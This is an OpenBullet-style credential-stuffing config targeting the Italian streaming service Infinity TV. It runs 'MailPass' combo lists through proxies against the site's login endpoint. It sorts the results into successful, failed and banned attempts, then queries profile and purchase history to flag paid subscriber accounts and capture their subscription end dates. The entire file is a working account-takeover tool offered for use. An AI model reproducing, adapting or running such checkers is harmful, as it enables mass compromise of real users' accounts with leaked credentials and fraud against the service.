[SETTINGS]
{
  "Name": "Infinity TV (IT)",
  "SuggestedBots": 1,
  "LastModified": "2018-05-05T19:06:06.7801624+00:00",
  "AdditionalInfo": "Only italian combos. Needs Italian proxies or italian IP (proxyless)",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.infinitytv.it/AVS/besc?action=Login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&channel=PCTV&service=INFINITY&remember=N" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "resultCode\":\"OK\",\"" 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or  password" 
  KEYCHAIN Ban OR 
    KEY ">403 Forbidden</h1" 
REQUEST POST "https://www.infinitytv.it/AVS/besc?action=GetProfile" AutoRedirect=TRUE 
  CONTENT "channel=PCTV&service=INFINITY" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "clusterName\":\"SUBSCRIBER" 
    KEY "itemType\":\"Subscription" 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "[{\"clusterName\":\"REGISTERED" 
    KEY "EXSUBSCRIBER" 
REQUEST POST "https://www.infinitytv.it/AVS/besc?action=GetPurchaseHistory" AutoRedirect=TRUE 
  CONTENT "channel=PCTV&service=INFINITY&itemType=Subscription" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "0,\"endDate\":" "," Recursive=FALSE -> VAR "UNIXDATE" "" "" 
FUNCTION UnixTimeToDate "<UNIXDATE>" -> VAR "DATE" 
PARSE "<DATE>" LR "" "" Recursive=FALSE -> CAP "End date" "" "" 
